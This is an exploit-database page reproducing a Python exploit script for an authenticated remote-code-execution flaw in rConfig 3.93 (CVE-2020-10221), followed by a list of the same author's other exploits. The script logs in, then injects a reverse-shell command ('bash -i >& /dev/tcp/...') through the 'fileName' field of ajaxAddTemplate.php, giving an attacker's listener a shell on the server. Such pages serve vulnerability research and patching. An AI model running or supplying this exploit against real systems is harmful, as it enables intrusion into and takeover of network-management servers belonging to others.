Search for hundreds of thousands of exploits

"rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution"

Author

Exploit author

"Engin Demirbilek"

Platform

Exploit platform

php

Release date

Exploit published date

2020-03-12

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
# Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution
# Date: 2020-03-08
# Exploit Author: Engin Demirbilek
# Vendor Homepage: https://www.rconfig.com/
# Version: rConfig <= 3.94
# Tested on: centOS
# CVE: CVE-2020-10221
# Advisory link: https://engindemirbilek.github.io/rconfig-3.93-rce

import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if len(sys.argv) < 6:
	print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"
	exit()

url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
payload = ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(sys.argv[4], sys.argv[5])

login = {
	'user':user,
	'pass':password,
	'sublogin':'1'
}
req = requests.Session()
print "Sendin login request ..."
login = req.post(url+"/lib/crud/userprocess.php", data=login, verify=False)

payload = {
	'fileName':payload,
}



print "[+] Sendin exploit ..."

exploit = req.post(url+"/lib/ajaxHandlers/ajaxAddTemplate.php",cookies=req.cookies, data=payload, headers={
'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded'},verify=False)

if exploit.status_code == 200:
	print "[+] Everything seems ok, check your listener."
else:
	print "[-] Exploit failed,  system is patched or credentials are wrong."
Release DateTitleTypePlatformAuthor
2020-03-26"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution"webappsphp"Engin Demirbilek"
2020-03-12"rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution"webappsphp"Engin Demirbilek"
2020-02-13"PANDORAFMS 7.0 - Authenticated Remote Code Execution"webappsphp"Engin Demirbilek"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48207/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.